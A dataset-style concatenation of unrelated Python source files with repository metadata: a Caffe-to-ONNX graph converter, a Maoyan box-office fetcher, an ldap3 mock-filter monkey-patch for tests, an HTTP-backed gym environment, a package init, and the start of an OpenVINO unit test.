ParamData = [[q/1. for q in p.data] if i==0 else [q/(1. + 1e-5) for q in p.data] for i,p in enumerate(Params)]
# comment it for tvm because tvm use broadcast at prelu layer
elif layer.type == "PReLU":
ParamShape = [[ParamShape[0][0], 1, 1]]
break
# Judge whether there is Param
if ParamShape != []:
ParamName = ParamName[0:len(ParamShape)]
ParamType = ParamType[0:len(ParamShape)]
for i in range(len(ParamShape)):
#print(ParamName[i])
ParamName[i] = layer.name+ParamName[i]
p_tvi = helper.make_tensor_value_info(ParamName[i], ParamType[i], ParamShape[i])
p_t = helper.make_tensor(ParamName[i],ParamType[i],ParamShape[i],ParamData[i])
self.onnxmodel.addInputsTVI(p_tvi)
self.onnxmodel.addInitTensor(p_t)
#print("add parameters " + ParamName[i] + " input information and tensor data")
if layer.type == "BatchNorm" or layer.type == "BN" or layer.type == "Scale":
return ParamName, ParamShape
return ParamName
# Manually add parameters to the input information and generate tensor storage data
def __addInputsTVIfromMannul(self,layer,ParamName,ParamType,ParamShape,ParamData):
Param_Name = copy.deepcopy(ParamName)
for i in range(len(ParamShape)):
Param_Name[i] = layer.name + ParamName[i]
p_tvi = helper.make_tensor_value_info(Param_Name[i], ParamType[i], ParamShape[i])
p_t = helper.make_tensor(Param_Name[i], ParamType[i], ParamShape[i], ParamData[i])
self.onnxmodel.addInputsTVI(p_tvi)
self.onnxmodel.addInitTensor(p_t)
#print("add parameters " + Param_Name[i] + " input information and tensor data")
return Param_Name
# Get the output name of the previous layer (that is, the input of the current layer)
def __getLastLayerOutNameAndShape(self,layer):
outname = []
outshape = []
# If the node list is empty, or the bottom of the current layer is in input_name, the input of the previous layer must be Input
if self.NodeList == []:
outname += self.model_input_name
outshape += self.model_input_shape
else:
for i in range(len(layer.bottom)):
for j in range(len(self.model_input_name)):
if layer.bottom[i] + '_input' == self.model_input_name[j]:
outname.append(self.model_input_name[j])
outshape.append(self.model_input_shape[j])
                # Because prototxt layers can reuse a name for both top and bottom (in-place layers),
                # match each layer.bottom to the most recent node whose top shares that name
name = None
shape = None
for node in self.NodeList:
for j in range(len(node.top) if node.node.op_type != "MaxPool" else 1): # comment if statement for original maxpool and maxunpool
if layer.bottom[i] == node.top[j]:
name = node.outputs_name[j]
shape = node.outputs_shape[j]
if name:
outname.append(name)
outshape.append(shape)
#try:
# assert outname, "failed at layer %s, layer's bottom not detected ... "%(layer.name)
#except:
if len(outname) == 0 :
print("layer %s, layer's bottom not detected ... "%(layer.name))
return outname, outshape
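    # Illustrative example: if an earlier node exposed top "conv1" with output name
    # "conv1_Y" and shape [1, 64, 112, 112], a layer whose bottom is ["conv1"] gets
    # outname == ["conv1_Y"] and outshape == [[1, 64, 112, 112]] from the search above.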
# Get the output name of the current layer, ie layername + "_ Y"
def __getCurrentLayerOutName(self,layer):
# return [layer.name+"_Y"]
# Consider the situation with multiple outputs
if layer.top == layer.bottom and len(layer.top) == 1:
return [layer.name+"_Y"]
return [out+"_Y" for out in layer.top]
def __getNodeList(self,Layers):
Layers = [ l for l in Layers if len(l.include) == 0 or l.include[0].phase is None or l.include[0].phase == 1]
#for l in Layers:
# print(l.name)
for i in range(len(Layers)):
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
if len(inname) == 0:
continue
# Convolution
if Layers[i].type == "Convolution" or Layers[i].type == Layer_CONVOLUTION:
# 1. Get node input name, input dimension, output name, node name
                # if Layers[i].name == "conv4_3_norm_mbox_loc":
                #     import ipdb; ipdb.set_trace()
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
conv_pname = self.__addInputsTVIfromParams(Layers[i],op_pname["Conv"],op_ptype["Conv"])
inname.extend(conv_pname)
# 3. Build conv_node
conv_node = op.createConv(Layers[i],nodename,inname,outname,input_shape)
# 4. Add node to node list
self.NodeList.append(conv_node)
self.__n += 1
# BatchNorm + Scale
elif Layers[i].type == "BatchNorm" or Layers[i].type == "BN":
# 1. Get node input name, input dimension, output name, node name
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
if i < len(Layers) - 1 and Layers[i+1].type == "Scale":
scale_pname, scale_pshape = self.__addInputsTVIfromParams(Layers[i + 1], op_pname["Scale"], op_ptype["Scale"])
bn_pname, bn_pshape = self.__addInputsTVIfromParams(Layers[i], op_pname["BatchNorm"], op_ptype["BatchNorm"])
assert bn_pshape == scale_pshape, "BatchNorm and Scale params should share the same shape"
inname.extend(scale_pname)
inname.extend(bn_pname)
else:
bn_pshape, _ = self.__getParamsShapeandData(Layers[i])
                custom_params = [np.ones(shape=bn_pshape[0], dtype=np.float64), 0.001 + np.zeros(shape=bn_pshape[1], dtype=np.float64)]  # np.float is a deprecated alias; use an explicit dtype
scale_pname = self.__addInputsTVIfromMannul(Layers[i], op_pname["Scale"], op_ptype["Scale"], bn_pshape, custom_params)
bn_pname, bn_pshape = self.__addInputsTVIfromParams(Layers[i], op_pname["BatchNorm"], op_ptype["BatchNorm"])
inname.extend(scale_pname)
inname.extend(bn_pname)
# 3. Build bn_node
bn_node = op.createBN(Layers[i], nodename, inname, outname, input_shape)
# 4. Add node to node list
self.NodeList.append(bn_node)
self.__n += 1
# Pooling
elif Layers[i].type == "Pooling" or Layers[i].type == Layer_POOLING:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Build pool_node
pool_node = op.createPooling(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(pool_node)
self.__n += 1
# MaxUnPool
elif Layers[i].type == "MaxUnpool":
# 1. Get node input name, input dimension, output name, node name
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Build unpool_node
unpool_node = op.createUnPooling(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(unpool_node)
self.__n += 1
# Eltwise
elif Layers[i].type == "Eltwise" or Layers[i].type == Layer_ELTWISE:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
            # 2. Build eltwise_node
eltwise_node = op.createEltwise(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(eltwise_node)
self.__n += 1
# Softmax
elif Layers[i].type == "Softmax" or Layers[i].type == Layer_SOFTMAX:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
            # 2. Build softmax_node
softmax_node = op.createSoftmax(Layers[i],nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(softmax_node)
self.__n += 1
# Relu
elif Layers[i].type == "ReLU" or Layers[i].type == Layer_RELU:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
            # 2. Build relu_node
relu_node = op.createRelu(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(relu_node)
self.__n += 1
# LRN
elif Layers[i].type == "LRN" or Layers[i].type == Layer_LRN:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
            # 2. Build LRN_node
LRN_node = op.createLRN(Layers[i],nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(LRN_node)
self.__n += 1
# Dropout
elif Layers[i].type == "Dropout" or Layers[i].type == Layer_DROPOUT or Layers[i].type == "Permute" or Layers[i].type == "Reshape":
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
            # 2. Build Dropout_node
Dropout_node = op.createDropout(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(Dropout_node)
self.__n += 1
elif Layers[i].type == "Flatten":
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
            # 2. Build Flatten_node
Flatten_node = op.createFlatten(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(Flatten_node)
self.__n += 1
elif Layers[i].type == "DetectionOutput":
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = 'Boxes'
print(nodename, inname, input_shape)
# 2. Boxes
output_shape = [[1,1000,5]]
outname = ["Boxes"]
# Build node
node = c2oNode(Layers[i], nodename, "Concat", inname, outname, input_shape, output_shape, {"axis":1})
# 3. Add nodes to the node list
self.NodeList.append(node)
nodename = 'Labels'
            # 4. Labels
output_shape = [[1,1000]]
outname = ["Labels"]
# Build node
node = c2oNode(Layers[i], nodename, "Concat", inname, outname, input_shape, output_shape, {"axis":1})
# 5. Add nodes to the node list
self.NodeList.append(node)
self.__n += 2
#print(nodename, " node construction completed")
# Upsample
elif Layers[i].type == "Upsample" or Layers[i].type == Layer_UPSAMPLE:
# 1. Get node input name, input dimension, output name, node name
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
paramshape = [[4, 1]]
paramdata = [[1.0, 1.0, Layers[i].upsample_param.scale, Layers[i].upsample_param.scale]]
pname = self.__addInputsTVIfromMannul(Layers[i],op_pname["Upsample"],op_ptype["Upsample"],paramshape,paramdata)
inname.extend(pname)
# 3. Build Upsample_node
Upsample_node = op.createUpsample(Layers[i], nodename, inname, outname, input_shape)
# 4. Add node to node list
self.NodeList.append(Upsample_node)
self.__n += 1
# Concat
elif Layers[i].type == "Concat" or Layers[i].type == Layer_CONCAT:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
            # 2. Build Concat_node
Concat_node = op.createConcat(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(Concat_node)
self.__n += 1
# PRelu
elif Layers[i].type == "PReLU":
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
pname = self.__addInputsTVIfromParams(Layers[i], op_pname["PRelu"], op_ptype["PRelu"])
inname.extend(pname)
# 3. Build PRelu_node
PRelu_node = op.createPRelu(Layers[i], nodename, inname, outname, input_shape)
# 4. Add node to node list
self.NodeList.append(PRelu_node)
self.__n += 1
# InnerProduct
# Since there is no fully connected layer in onnx, it needs to be split. There are two methods for splitting (Reshape + Gemm, Reshape + MatMul + Add)
elif Layers[i].type == "InnerProduct" or Layers[i].type == Layer_INNER_PRODUCT:
reshape_layer = copy.deepcopy(Layers[i]) # Deep copy
# 1. Get node input name, input dimension, output name, node name
reshape_inname, reshape_input_shape = self.__getLastLayerOutNameAndShape(reshape_layer) # Get reshape input name list and input shape
reshape_outname = [reshape_layer.name + "_Reshape_Y"]
reshape_nodename = reshape_layer.name+"_Reshape"
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
paramshape = [[2]]
paramdata = op.getReshapeOutShape(Layers[i],reshape_input_shape)
reshape_pname = self.__addInputsTVIfromMannul(reshape_layer,op_pname["Reshape"],op_ptype["Reshape"],paramshape,paramdata)
reshape_inname.extend(reshape_pname)
#3. Build reshape_node
reshape_node = op.createReshape(reshape_layer,reshape_nodename, reshape_inname, reshape_outname, reshape_input_shape)
# 4. Add node to node list
self.NodeList.append(reshape_node)
self.__n += 1
# Gemm
gemm_layer = copy.deepcopy(Layers[i]) # Deep copy
# 1. Get node input name, input dimension, output name, node name
gemm_inname = reshape_outname
gemm_input_shape = self.NodeList[self.__n-1].outputs_shape
gemm_outname = [gemm_layer.name+"_Gemm_Y"]
gemm_nodename = gemm_layer.name+"_Gemm"
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
gemm_pname = self.__addInputsTVIfromParams(gemm_layer,op_pname["InnerProduct"],op_ptype["InnerProduct"]) # Obtain input parameters. For add, blobs [1] does not require bias, so directly obtain blobs [0]
gemm_inname.extend(gemm_pname)
#3. Build gemm_node
matmul_node = op.createGemm(gemm_layer, gemm_nodename, gemm_inname, gemm_outname, gemm_input_shape, gemm_layer.inner_product_param.num_output)
# 4. Add node to node list
self.NodeList.append(matmul_node)
self.__n += 1
# Deconvolution
elif Layers[i].type == "Deconvolution":
# 1. Get node input name, input dimension, output name, node name
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
conv_pname = self.__addInputsTVIfromParams(Layers[i], op_pname["ConvTranspose"], op_ptype["ConvTranspose"])
inname.extend(conv_pname)
#3. Build conv_node
conv_node = op.createConvTranspose(Layers[i], nodename, inname, outname, input_shape)
#if self.debug:
# self.__print_debug_info(nodename, inname, outname, input_shape, conv_node.outputs_shape)
# 4. Add node to node list
self.NodeList.append(conv_node)
self.__n += 1
        # ArgMax
elif Layers[i].type == "ArgMax":
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Build argmax_node
argmax_node = op.createArgmax(Layers[i],nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(argmax_node)
self.__n += 1
# Determine whether the current node is an output node
def judgeoutput(self,current_node,nodelist):
for outname in current_node.outputs_name:
for node in nodelist:
if outname in node.inputs_name:
return False
return True
# Add model output information and intermediate node information
def __addOutputsTVIandValueInfo(self):
for i in range(len(self.NodeList)):
out_type = TensorProto.FLOAT
if self.NodeList[i].node.op_type == 'ArgMax':
out_type = TensorProto.INT64
if self.judgeoutput(self.NodeList[i],self.NodeList):# Build output node information
lastnode = self.NodeList[i]
for j in range(len(lastnode.outputs_shape)):
output_tvi = helper.make_tensor_value_info(lastnode.outputs_name[j], out_type,lastnode.outputs_shape[j])
self.onnxmodel.addOutputsTVI(output_tvi)
else:# Build intermediate node information
innernode = self.NodeList[i]
for k in range(len(innernode.outputs_shape)):
hid_out_tvi = helper.make_tensor_value_info(innernode.outputs_name[k], out_type, innernode.outputs_shape[k])
self.onnxmodel.addValueInfoTVI(hid_out_tvi)
print("add model output information and model intermediate output information")
# Create a model
def createOnnxModel(self):
node_def = [Node.node for Node in self.NodeList]
graph_def = helper.make_graph(
node_def,
self.onnxmodel.name,
self.onnxmodel.in_tvi,
self.onnxmodel.out_tvi,
self.onnxmodel.init_t,
value_info=self.onnxmodel.hidden_out_tvi
)
op = onnx.OperatorSetIdProto()
op.version = 9
model_def = helper.make_model(graph_def, producer_name='caffe', opset_imports=[op])
#model_def = helper.make_model(graph_def, producer_name='caffe')
print("*.onnx model conversion completed")
return model_def
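# Illustrative usage sketch (assumption: `converter` stands in for an instance of the
# enclosing Caffe-to-ONNX converter class, whose construction is defined elsewhere in
# this file). The returned ModelProto can be validated and serialized with the
# standard onnx helpers:
#
#     model_def = converter.createOnnxModel()
#     onnx.checker.check_model(model_def)   # structural validation
#     onnx.save(model_def, "converted.onnx")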
| 47.986622
| 219
| 0.58482
|
b5714e6101d4bcd35275a8ce80bf5ba0f8812b29
| 2,099
|
py
|
Python
|
everyday_wechat/control/moviebox/maoyan_movie_box.py
|
filon7/EverydayWechat
|
cf4f509eb570de312995ce5c3b517f369753a1e9
|
[
"MIT"
] | 1
|
2019-10-07T02:32:30.000Z
|
2019-10-07T02:32:30.000Z
|
everyday_wechat/control/moviebox/maoyan_movie_box.py
|
filon7/EverydayWechat
|
cf4f509eb570de312995ce5c3b517f369753a1e9
|
[
"MIT"
] | null | null | null |
everyday_wechat/control/moviebox/maoyan_movie_box.py
|
filon7/EverydayWechat
|
cf4f509eb570de312995ce5c3b517f369753a1e9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Project: EverydayWechat-Github
Creator: DoubleThunder
Create time: 2019-08-30 12:22
Introduction: Maoyan real-time box office. Dashboard: https://piaofang.maoyan.com/dashboard
API endpoint: https://box.maoyan.com/promovie/api/box/second.json?beginDate=20190830
"""
import requests
from datetime import datetime
def get_maoyan_movie_box(date='', is_expired=False):
"""
    Fetch the real-time box office data for a given date.
    https://box.maoyan.com/promovie/api/box/second.json?beginDate=20190830
    :param date: str, date in yyyyMMdd format
    :param is_expired: bool, controls whether the summary is labelled as real-time box office
    :rtype: str
"""
date_ = date or datetime.now().strftime('%Y%m%d')
    print('Fetching box office data for {} ...'.format(date_))
# try:
resp = requests.get('https://box.maoyan.com/promovie/api/box/second.json?beginDate={}'.format(date_))
if resp.status_code == 200:
# print(resp.text)
content_dict = resp.json()
if content_dict['success']:
data_dict = content_dict['data']
total_box_info = data_dict['totalBoxInfo']
box_list = data_dict['list']
box_info_list = []
for i, r in enumerate(box_list[:10]):
                movie_name = r['movieName']
                box_info = r['boxInfo']
                sumBoxInfo = r['sumBoxInfo']
                box_info_list.append('{}.《{}》({}万,累积:{})'.format(str(i + 1), movie_name, box_info, sumBoxInfo))
cur_date = datetime.strptime(date_, '%Y%m%d').strftime('%Y{}%m{}%d{}').format('年', '月', '日')
return_text = "{cur_date} {box_name}\n当日总票房:{total_box_info}万\n{box_info}".format(
cur_date=cur_date,
box_name="实时票房" if is_expired else "当日票房",
total_box_info=total_box_info,
box_info='\n'.join(box_info_list)
)
return return_text
else:
            print('Failed to fetch box office data: {}'.format(content_dict['msg']))
            return None
    print('Failed to fetch box office data.')
# except Exception as exception:
# print(str(exception))
return None
# __date = '20190831'
# dd = get_maoyan_movie_box(__date, is_expired=False)
# print(dd)
| 32.292308
| 112
| 0.602192
|
0edb29ac5643be7e5af6f0475976201da240b35e
| 7,196
|
py
|
Python
|
lib/python/treadmill/tests/treadmill_ldap_patch.py
|
vrautela/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | 133
|
2016-09-15T13:36:12.000Z
|
2021-01-18T06:29:13.000Z
|
lib/python/treadmill/tests/treadmill_ldap_patch.py
|
vrautela/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | 108
|
2016-12-28T23:41:27.000Z
|
2020-03-05T21:20:37.000Z
|
lib/python/treadmill/tests/treadmill_ldap_patch.py
|
evreng/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | 69
|
2016-09-23T20:38:58.000Z
|
2020-11-11T02:31:21.000Z
|
"""Monkey-patch the evaluate_filter_node method of ldap3's MockBaseStrategy.
This function is extracted from ldap3 with a small change in the
`node.tag == MATCH_SUBSTRING` branch. See:
ldap3/strategy/mockBase.py line 822 for ldap3 version 2.3
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import re
from ldap3.strategy import mockBase
from ldap3.strategy.mockBase import (
to_unicode, log, log_enabled, ERROR, LDAPDefinitionError,
SERVER_ENCODING,
ROOT, AND, OR, NOT, MATCH_APPROX,
MATCH_GREATER_OR_EQUAL, MATCH_LESS_OR_EQUAL, MATCH_EXTENSIBLE,
MATCH_PRESENT, MATCH_SUBSTRING, MATCH_EQUAL
)
def monkey_patch():
"""Perform the monkey patching."""
mockBase.MockBaseStrategy.evaluate_filter_node = evaluate_filter_node
# The patched function from ldap3 doesn't follow our conventions
# pylint: disable=too-many-nested-blocks
# pylint: disable=too-many-branches
# pylint: disable=too-many-statements
def evaluate_filter_node(self, node, candidates):
"""After evaluation each 2 sets are added to each MATCH node, one for the
matched object and one for unmatched object. The unmatched object set is
needed if a superior node is a NOT that reverts the evaluation. The BOOLEAN
nodes mix the sets returned by the MATCH nodes"""
node.matched = set()
node.unmatched = set()
if node.elements:
for element in node.elements:
self.evaluate_filter_node(element, candidates)
if node.tag == ROOT:
return node.elements[0].matched
elif node.tag == AND:
for element in node.elements:
if not node.matched:
node.matched.update(element.matched)
else:
node.matched.intersection_update(element.matched)
if not node.unmatched:
node.unmatched.update(element.unmatched)
else:
node.unmatched.intersection_update(element.unmatched)
elif node.tag == OR:
for element in node.elements:
node.matched.update(element.matched)
node.unmatched.update(element.unmatched)
elif node.tag == NOT:
node.matched = node.elements[0].unmatched
node.unmatched = node.elements[0].matched
elif node.tag == MATCH_GREATER_OR_EQUAL:
attr_name = node.assertion['attr']
attr_value = node.assertion['value']
for candidate in candidates:
if attr_name in self.connection.server.dit[candidate]:
for value in self.connection.server.dit[candidate][attr_name]:
if value.isdigit() and attr_value.isdigit():
if int(value) >= int(attr_value):
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
else:
if to_unicode(
value, SERVER_ENCODING
).lower() >= to_unicode(
attr_value, SERVER_ENCODING
).lower(): # case insensitive string comparison
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
elif node.tag == MATCH_LESS_OR_EQUAL:
attr_name = node.assertion['attr']
attr_value = node.assertion['value']
for candidate in candidates:
if attr_name in self.connection.server.dit[candidate]:
for value in self.connection.server.dit[candidate][attr_name]:
if value.isdigit() and attr_value.isdigit():
if int(value) <= int(attr_value):
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
else:
if to_unicode(
value, SERVER_ENCODING
).lower() <= to_unicode(
attr_value, SERVER_ENCODING
                    ).lower(): # case insensitive string comparison
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
elif node.tag == MATCH_EXTENSIBLE:
self.connection.last_error =\
'Extensible match not allowed in Mock strategy'
if log_enabled(ERROR):
log(ERROR, '<%s> for <%s>',
self.connection.last_error, self.connection)
raise LDAPDefinitionError(self.connection.last_error)
elif node.tag == MATCH_PRESENT:
attr_name = node.assertion['attr']
for candidate in candidates:
if attr_name in self.connection.server.dit[candidate]:
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
elif node.tag == MATCH_SUBSTRING:
attr_name = node.assertion['attr']
# rebuild the original substring filter
if 'initial' in node.assertion and\
node.assertion['initial'] is not None:
substring_filter = re.escape(
to_unicode(node.assertion['initial'], SERVER_ENCODING)
)
else:
substring_filter = ''
if 'any' in node.assertion and node.assertion['any'] is not None:
for middle in node.assertion['any']:
substring_filter += '.*' + re.escape(
to_unicode(middle, SERVER_ENCODING)
)
if 'final' in node.assertion and node.assertion['final'] is not None:
substring_filter += '.*' + re.escape(
to_unicode(node.assertion['final'], SERVER_ENCODING)
)
# This is the patched condition:
# node.assertion['any'] => node.assertion.get('any', None)
if substring_filter and not node.assertion.get('any', None) and not\
node.assertion.get('final', None): # only initial, adds .*
substring_filter += '.*'
regex_filter = re.compile(
substring_filter, flags=re.UNICODE | re.IGNORECASE
) # unicode AND ignorecase
for candidate in candidates:
if attr_name in self.connection.server.dit[candidate]:
for value in self.connection.server.dit[candidate][attr_name]:
if regex_filter.match(to_unicode(value, SERVER_ENCODING)):
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
else:
node.unmatched.add(candidate)
elif node.tag == MATCH_EQUAL or node.tag == MATCH_APPROX:
attr_name = node.assertion['attr']
attr_value = node.assertion['value']
for candidate in candidates:
if attr_name in self.connection.server.dit[candidate] and\
self.equal(candidate, attr_name, attr_value):
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
return None
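if __name__ == '__main__':
    # Minimal sketch (an assumption, not part of the upstream module): the patch only
    # needs to be applied once, before any ldap3 mock-strategy searches are issued by
    # the tests. This applies it and confirms the method was actually swapped.
    monkey_patch()
    print('evaluate_filter_node patched:',
          mockBase.MockBaseStrategy.evaluate_filter_node is evaluate_filter_node)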
| 42.329412
| 79
| 0.588938
|
701c989e503de200104f08eefd68325d4b7710ff
| 2,633
|
py
|
Python
|
simple_virtual_env/virtual_env.py
|
iasawseen/MultiServerRL
|
8460b162eb33eeae35eb01818ac6a5c26fedce0c
|
[
"MIT"
] | 5
|
2019-02-28T09:25:58.000Z
|
2021-07-19T08:49:18.000Z
|
simple_virtual_env/virtual_env.py
|
iasawseen/MultiServerRL
|
8460b162eb33eeae35eb01818ac6a5c26fedce0c
|
[
"MIT"
] | null | null | null |
simple_virtual_env/virtual_env.py
|
iasawseen/MultiServerRL
|
8460b162eb33eeae35eb01818ac6a5c26fedce0c
|
[
"MIT"
] | null | null | null |
import abc
import json
import gym
import requests
from requests.exceptions import RequestException
import time
import numpy as np
class VirtualEnvironment(gym.Env):
def __init__(self, host_tcp, port_tcp):
self.host_tcp = host_tcp
self.port_tcp = port_tcp
@staticmethod
def _make_request(request, json_data=None):
if json_data is None:
json_data = {}
flag = True
res = None
while flag:
try:
res = requests.post(request, json=json_data).json()
except RequestException:
time.sleep(1)
continue
flag = False
return res
def step(self, action):
json_data = json.dumps({'action': action})
res = self._make_request('http://{host}:{port}/post_step_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
return res['observation'], res['reward'], res['done'], res['info']
def reset(self):
json_data = json.dumps({})
res = self._make_request('http://{host}:{port}/post_reset_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
return res['observation']
def render(self, mode='human'):
json_data = json.dumps({'mode': mode})
res = self._make_request('http://{host}:{port}/post_render_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
res['screen'] = np.array(res['screen'])
return res['screen']
def close(self):
json_data = json.dumps({})
res = self._make_request('http://{host}:{port}/post_close_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
def seed(self, seed=None):
json_data = json.dumps({'seed': seed})
res = self._make_request('http://{host}:{port}/post_close_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
@property
def state(self):
json_data = json.dumps({})
res = self._make_request('http://{host}:{port}/post_state_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
return res['state']
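if __name__ == '__main__':
    # Hedged usage sketch: host/port are made-up values, and a matching HTTP server
    # exposing the post_*_request endpoints used above must already be running.
    env = VirtualEnvironment(host_tcp='127.0.0.1', port_tcp=8080)
    observation = env.reset()
    done = False
    total_reward = 0.0
    while not done:
        action = 0  # placeholder policy: always take action 0
        observation, reward, done, info = env.step(action)
        total_reward += reward
    print('episode finished, total reward:', total_reward)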
| 39.298507
| 115
| 0.511204
|
5633ec7f19016782b04a11f1d5f885bd9cf0a05d
| 341
|
py
|
Python
|
nnlib/__init__.py
|
AleksaC/nnlib
|
5ad0fd570471626e9994100c844e1ed1493d94bd
|
[
"MIT"
] | 5
|
2019-07-09T20:56:10.000Z
|
2020-02-13T19:31:47.000Z
|
nnlib/__init__.py
|
AleksaC/nnlib
|
5ad0fd570471626e9994100c844e1ed1493d94bd
|
[
"MIT"
] | 1
|
2021-06-01T23:59:21.000Z
|
2021-06-01T23:59:21.000Z
|
nnlib/__init__.py
|
AleksaC/nnlib
|
5ad0fd570471626e9994100c844e1ed1493d94bd
|
[
"MIT"
] | 1
|
2019-08-19T11:00:55.000Z
|
2019-08-19T11:00:55.000Z
|
from . import autodiff
from . import datasets
from . import layers
from . import utils
from . import activations
from . import callbacks
from . import config
from . import initializers
from . import losses
from . import metrics
from . import optimizers
from . import regularizers
from .core import Model, load_model
__version__ = "0.0.1"
| 18.944444
| 35
| 0.771261
|
0cab848fbc2f19477d7233e2587496458033b2fd
| 1,531
|
py
|
Python
|
tools/mo/unit_tests/mo/back/kaldi_remove_memory_output_test.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 1,127
|
2018-10-15T14:36:58.000Z
|
2020-04-20T09:29:44.000Z
|
tools/mo/unit_tests/mo/back/kaldi_remove_memory_output_test.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 439
|
2018-10-20T04:40:35.000Z
|
2020-04-19T05:56:25.000Z
|
tools/mo/unit_tests/mo/back/kaldi_remove_memory_output_test.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 414
|
2018-10-17T05:53:46.000Z
|
2020-04-16T17:29:53.000Z
|
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
from openvino.tools.mo.back.kaldi_remove_memory_output import KaldiRemoveMemoryOutputBackReplacementPattern
from unit_tests.utils.graph import build_graph
class KaldiRemoveMemoryOutputTest(unittest.TestCase):
nodes = {
'input_node': {
'kind': 'data'
},
'memory_node': {
'op': 'Assign',
'kind': 'op'
},
'output_node': {
'kind': 'data'
},
'op_output': {
